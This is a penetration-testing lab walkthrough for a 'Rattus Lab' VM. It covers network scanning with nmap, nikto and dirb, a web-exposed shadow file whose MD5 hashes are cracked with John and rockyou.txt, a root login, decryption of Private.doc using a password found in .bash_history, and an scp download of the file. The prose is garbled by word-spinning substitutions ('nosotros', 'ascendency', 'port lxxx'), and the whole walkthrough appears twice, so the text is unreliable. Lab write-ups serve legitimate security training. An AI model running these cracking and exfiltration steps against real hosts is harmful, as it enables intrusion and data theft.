Rattus Lab:
After configuring the network settings on each vm, nosotros scan the network to discovery the IP address of the 'server':
- the 'netdiscover' ascendency volition present upward IP addresses discovered on the configured network. In our representative 10.8.7.2/29 was our IP address for the 'server' in addition to for our Kali box it was 10.8.7.4/29 (as the kickoff IP address available on the network).
Note: I had to practise a VMnet3 network (under the Virtual Network Editor) , assign it the IP address network of 10.8.7.0/29. I configured my VM workstation's IP address nether VMnet3 in addition to ran 'netdiscover'.
The 'server':
root@kali: # nmap -sT -p- -T4 10.8.7.2
Nmap scan study for 10.8.7.2
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
113/tcp open ident
139/tcp open netbios-ssn
445/tcp open microsoft-ds
I besides wanted to scan for UDP ports, in addition to thence I ran the ascendency higher upward modified accordingly...but it was going to accept forever, in addition to thence I stopped it!
Upon checking what's running on port 80, nosotros discovery out, based on the e-mail addresses, to a greater extent than or less potential usernames, nosotros tin run to beast force: tskies@rattus.lab, jsummer@rattus.lab, mhog@rattus.lab.
Respectively:
tskies
jsummer
mhog
More testing of port lxxx amongst nikto in addition to dirbuster:
Nikto:
root@kali: # nikto -h http://10.8.7.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.8.7.2
+ Target Hostname: 10.8.7.2
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/1.3.31 (Unix) PHP/4.4.4
+ Server leaks inodes via ETags, header establish amongst file /, inode: 20914, size: 3001, mtime: Friday February xviii 03:33:59 2011
+ The anti-clickjacking X-Frame-Options header is non present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ PHP/4.4.4 appears to travel outdated (current is at to the lowest degree 5.4.26)
+ Apache/1.3.31 appears to travel outdated (current is at to the lowest degree Apache/2.4.7). Apache 2.0.65 (final release) in addition to 2.2.26 are besides current.
+ OSVDB-637: Enumeration of users is possible past times requesting username (responds amongst 'Forbidden' for users, 'not found' for non-existent users).
+ Uncommon header 'tcn' found, amongst contents: list
+ Apache mod_negotiation is enabled amongst MultiViews, which allows attackers to easily beast strength file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The next alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could let clients to relieve files on the spider web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may let clients to take away files on the spider web server.
+ HTTP method ('Allow' Header): 'CONNECT' may let server to proxy customer requests.
+ HTTP method: 'PATCH' may let customer to lawsuit while commands to server. See RFC-5789.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may let clients to modify file locations on the spider web server.
+ WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed every bit allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/4.4.4
+ OSVDB-3092: /info/: This powerfulness travel interesting...
+ OSVDB-3233: /info.php: PHP is installed, in addition to a attempt script which runs phpinfo() was found. This gives a lot of organization information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's listing (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7355 requests: 0 error(s) in addition to 22 item(s) reported on remote host
---------------------------------------------------------------------------
+ one host(s) tested
Dirbuster:
root@kali: # dirb http://10.8.7.2
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://10.8.7.2/ ----
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37710)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)
+ http://10.8.7.2/ operator (CODE:403|SIZE:275)
+ http://10.8.7.2/ rootage (CODE:403|SIZE:271)
-----------------
DOWNLOADED: 4592 - FOUND: 9
Browsing the establish directories, nosotros stumble upon this:
http://10.8.7.2/garbage
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
Attempting to scissure the MD5 hashed passwords online....no luck!
We volition endeavour j0hn, the password cracker, amongst the famous rockyou.txt password file...
root@kali: /Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt loophole
Loaded three password hashes amongst three unlike salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
nostradamus (tskies)
albatros (root)
We logon every bit root, to run across if it's possible... in addition to it is! :)
We browse through the /home directories in addition to discovery an .enc encrypted file.
Maybe the .bash_history file volition render us amongst to a greater extent than or less clues... in addition to it does...
Below is the ascendency used to encrypted the file:
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
We contrary the encryption, to run across if nosotros tin thought the file:
openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
And nosotros download onto our Kali box the Private.doc file:
root@kali: /Desktop# scp root@10.8.7.2:/root/Private.doc /root/Desktop/
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the organization yous must run valid credentials.
===========================================================
root@10.8.7.2's password:
Private.doc 100%
It seems to travel to a greater extent than or less technology scientific discipline documentation!
The terminate ....
After configuring the network settings on each vm, nosotros scan the network to discovery the IP address of the 'server':
- the 'netdiscover' ascendency volition present upward IP addresses discovered on the configured network. In our representative 10.8.7.2/29 was our IP address for the 'server' in addition to for our Kali box it was 10.8.7.4/29 (as the kickoff IP address available on the network).
Note: I had to practise a VMnet3 network (under the Virtual Network Editor) , assign it the IP address network of 10.8.7.0/29. I configured my VM workstation's IP address nether VMnet3 in addition to ran 'netdiscover'.
The 'server':
root@kali: # nmap -sT -p- -T4 10.8.7.2
Nmap scan study for 10.8.7.2
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
113/tcp open ident
139/tcp open netbios-ssn
445/tcp open microsoft-ds
I besides wanted to scan for UDP ports, in addition to thence I ran the ascendency higher upward modified accordingly...but it was going to accept forever, in addition to thence I stopped it!
Upon checking what's running on port 80, nosotros discovery out, based on the e-mail addresses, to a greater extent than or less potential usernames, nosotros tin run to beast force: tskies@rattus.lab, jsummer@rattus.lab, mhog@rattus.lab.
Respectively:
tskies
jsummer
mhog
More testing of port lxxx amongst nikto in addition to dirbuster:
Nikto:
root@kali: # nikto -h http://10.8.7.2
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.8.7.2
+ Target Hostname: 10.8.7.2
+ Target Port: 80
---------------------------------------------------------------------------
+ Server: Apache/1.3.31 (Unix) PHP/4.4.4
+ Server leaks inodes via ETags, header establish amongst file /, inode: 20914, size: 3001, mtime: Friday February xviii 03:33:59 2011
+ The anti-clickjacking X-Frame-Options header is non present.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ PHP/4.4.4 appears to travel outdated (current is at to the lowest degree 5.4.26)
+ Apache/1.3.31 appears to travel outdated (current is at to the lowest degree Apache/2.4.7). Apache 2.0.65 (final release) in addition to 2.2.26 are besides current.
+ OSVDB-637: Enumeration of users is possible past times requesting username (responds amongst 'Forbidden' for users, 'not found' for non-existent users).
+ Uncommon header 'tcn' found, amongst contents: list
+ Apache mod_negotiation is enabled amongst MultiViews, which allows attackers to easily beast strength file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The next alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE, POST, PUT, DELETE, CONNECT, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could let clients to relieve files on the spider web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may let clients to take away files on the spider web server.
+ HTTP method ('Allow' Header): 'CONNECT' may let server to proxy customer requests.
+ HTTP method: 'PATCH' may let customer to lawsuit while commands to server. See RFC-5789.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may let clients to modify file locations on the spider web server.
+ WebDAV enabled (UNLOCK LOCK MKCOL COPY PROPPATCH PROPFIND listed every bit allowed)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ Retrieved x-powered-by header: PHP/4.4.4
+ OSVDB-3092: /info/: This powerfulness travel interesting...
+ OSVDB-3233: /info.php: PHP is installed, in addition to a attempt script which runs phpinfo() was found. This gives a lot of organization information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's listing (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ 7355 requests: 0 error(s) in addition to 22 item(s) reported on remote host
---------------------------------------------------------------------------
+ one host(s) tested
Dirbuster:
root@kali: # dirb http://10.8.7.2
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://10.8.7.2/ ----
==> DIRECTORY: http://10.8.7.2/Images/
+ http://10.8.7.2/cgi-bin/ (CODE:403|SIZE:274)
+ http://10.8.7.2/garbage (CODE:200|SIZE:288)
+ http://10.8.7.2/index (CODE:200|SIZE:3001)
+ http://10.8.7.2/index.html (CODE:200|SIZE:3001)
+ http://10.8.7.2/info (CODE:200|SIZE:37710)
+ http://10.8.7.2/info.php (CODE:200|SIZE:37490)
+ http://10.8.7.2/status (CODE:200|SIZE:2456)
+ http://10.8.7.2/ operator (CODE:403|SIZE:275)
+ http://10.8.7.2/ rootage (CODE:403|SIZE:271)
-----------------
DOWNLOADED: 4592 - FOUND: 9
Browsing the establish directories, nosotros stumble upon this:
http://10.8.7.2/garbage
root:$1$x2YBL0KB$E7QI7AF9ZeiqcfMRQ4KZ11:15018:0:::::
smmsp:!!:9797:0:::::
mysql:!!:9797:0:::::
rpc:!!:9797:0:::::
sshd:!!:9797:0:::::
apache:!!:9797:0:::::
nobody:!!:9797:0:::::
mhog:$1$ZQAbXwf3$TgcNjljKW.2tlJw4OICDr1:15019:0:::::0
tskies:$1$ZvNtdn0x$ck5hnAwXg.OLQPOtg28Hb.:15019:0:::::0
Attempting to scissure the MD5 hashed passwords online....no luck!
We volition endeavour j0hn, the password cracker, amongst the famous rockyou.txt password file...
root@kali: /Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt loophole
Loaded three password hashes amongst three unlike salts (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
nostradamus (tskies)
albatros (root)
We logon every bit root, to run across if it's possible... in addition to it is! :)
We browse through the /home directories in addition to discovery an .enc encrypted file.
Maybe the .bash_history file volition render us amongst to a greater extent than or less clues... in addition to it does...
Below is the ascendency used to encrypted the file:
openssl enc -aes-256-cbc -e -in Private.doc -out Private.doc.enc -pass pass:nostradamus
We contrary the encryption, to run across if nosotros tin thought the file:
openssl enc -aes-256-cbc -d -in Private.doc.enc -out Private.doc -pass pass:nostradamus
And nosotros download onto our Kali box the Private.doc file:
root@kali: /Desktop# scp root@10.8.7.2:/root/Private.doc /root/Desktop/
===========================================================
WELCOME TO RATTUS LABS
===========================================================
You've been connected to loophole.rattus.lab
To access the organization yous must run valid credentials.
===========================================================
root@10.8.7.2's password:
Private.doc 100%
It seems to travel to a greater extent than or less technology scientific discipline documentation!
The terminate ....
